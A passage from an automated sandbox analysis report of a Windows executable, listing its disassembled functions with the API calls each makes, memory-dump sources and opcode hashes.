                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                      • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                      • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                      • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                      • RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID:
                                                      • API String ID: 3356406503-0
                                                      • Opcode ID: 3f9e4d0e37633bf98c355a218f283f93097903ae4b557426e4e4ad18f8810dd1
                                                      • Instruction ID: 56becb9136408d6600d44ef8ee1fb8662aacbb8094ba5771dc16c944e9e3e358
                                                      • Opcode Fuzzy Hash: 3f9e4d0e37633bf98c355a218f283f93097903ae4b557426e4e4ad18f8810dd1
                                                      • Instruction Fuzzy Hash: 39116D71900219EADF14DFA0DA589AE77B4BF04349F20447FE406B62C0D7B84A45EB5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                      • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                      • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                      • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004057DA Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 004057EA
                                                        • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 00405836
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: InitializeMessageSendUninitialize
                                                      • String ID:
                                                      • API String ID: 2896919175-0
                                                      • Opcode ID: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
                                                      • Instruction ID: 47b15979fd2771e4c3211fb1205fa32a21028b5b356e028cb2016eb217598776
                                                      • Opcode Fuzzy Hash: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
                                                      • Instruction Fuzzy Hash: 9EF09073A006009AEB116B54AE01B6B77A4FBD4705F05843AEE84632A1DB794C128B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405C65 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                      • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3712363035-0
                                                      • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                      • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                      • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                      • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406A76 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                        • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                        • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                        • Part of subcall function 00406A06: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                      • String ID:
                                                      • API String ID: 2547128583-0
                                                      • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                      • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                      • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                      • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406172 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                      • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                      • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                      • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040614D Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,00405D52,?,?,00000000,00405F28,?,?,?,?), ref: 00406152
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406166
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                      • Instruction ID: c2cf34f9040e51e437c363cb0e130cc408ba31f940be0e29863539f2f5e5855d
                                                      • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                      • Instruction Fuzzy Hash: 34D0C976504220AFC2102728AE0889BBB55DB552717028A35F8A9A22B0CB314C6A8694
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405C30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                      • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLast
                                                      • String ID:
                                                      • API String ID: 1375471231-0
                                                      • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                      • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                      • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                      • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004023B7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWrite
                                                      • String ID:
                                                      • API String ID: 390214022-0
                                                      • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                      • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                      • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                      • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406224 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,004106EB,0040CEF0,0040357E,0040CEF0,004106EB,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                      • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                      • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                      • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004061F5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                      • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                      • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                      • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
